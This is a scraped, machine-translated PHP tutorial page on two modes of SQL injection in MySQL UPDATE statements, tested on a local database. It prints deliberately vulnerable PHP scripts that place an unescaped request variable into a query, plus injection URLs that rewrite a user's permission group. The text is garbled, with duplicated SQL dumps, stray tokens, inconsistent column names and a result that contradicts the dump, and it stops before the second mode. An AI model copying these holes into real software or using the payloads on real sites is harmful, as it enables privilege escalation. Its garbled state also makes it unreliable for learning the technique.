Home >Backend Development >PHP Tutorial >Two modes of UPDATE injection (mysql+php)_PHP tutorial
Two modes of UPDATE injection (mysql+php)_PHP tutorial
- WBOYOriginal
- 2016-07-13 17:34:10830browse
1. Test environment:
SQL Query:$sql ";
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33
2. Test database structure:
3. Test mode:
1. The variable does not contain '' or ""[MOD1]
The script only modifies the pass of user=’heige’. If groudid represents the user’s permission level, our purpose is to achieve it by constructing $p
For the purpose of modifying groupid:
Then we submit: http://127.0.0.1/test1.php?p=123456,groudid=1
Query in mysql:
-----start---
-- Database: `test`
--
-----start---
-- 数据库: `test`
--
-- --------------------------------------------------------
--
-- 表的结构 `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- 导出表中的数据 `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
-------------------------------------------------- --------
--
<!--p <--><br>
//test1.php Mod1 <br>
<br>
$servername = "localhost"; <br>
<br>
$dbusername = "root"; <br>
<br>
$dbpassword = ""; <br>
<br>
$dbname = "test"; <br>
<br>
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); <br>
<br>
$sql = "update userinfo set pass=$p where user=’heige’";//<--$P没有使用单引号 <br/>
<br/>
$result = mysql_db_query($dbname, $sql); <br/>
<br/>
$userinfo = mysql_fetch_array($result); <br/>
<br/>
echo "
<p>SQL Query:$sql</p>
<p>"; <br/>
<br/>
?>
-- Table structure `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--Export the data in the table `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
?>
The grudid of user heige has been changed from 2 to 1 :)
So we can get that the injection without '' or "" update can be successful. This is our mode 1.
2. Variables with '' or ""[MOD2]
mysql> select * from userinfo;
+---------+-------+--------+
| grudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("Database connection failed");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P uses single quotes <🎜>
<🎜>
$result = mysql_db_query($dbname, $sql); <🎜>
<🎜>
$userinfo = mysql_fetch_array($result); <🎜>
<🎜>
echo "
<🎜>SQL Query:$sql <🎜>
<🎜>"; <🎜>
<🎜>
?>
To close ‘we construct $p should be 123456’, grudid=’2 Submit:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 When gpc=on, ‘becomes’
The submitted statement becomes: SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’
mysql query:
| mysql> select * from userinfo; +---------+-------+--------------------+ | groudid | user | pass | +---------+-------+--------------------+ | 2 | heige | 123456’,groudid=’1 | +---------+-------+--------------------+ 1 row in set (0.00 sec) |
|
| grudid | user | pass | +---------+-------+--------------------+ | 2 | heige | 123456’,groudid=’1 | +---------+-------+--------------------+ 1 row in set (0.00 sec) |
The groudid has not been modified. So when the variable is '' or "", it is not injected at all? No. Let’s look at mode 2: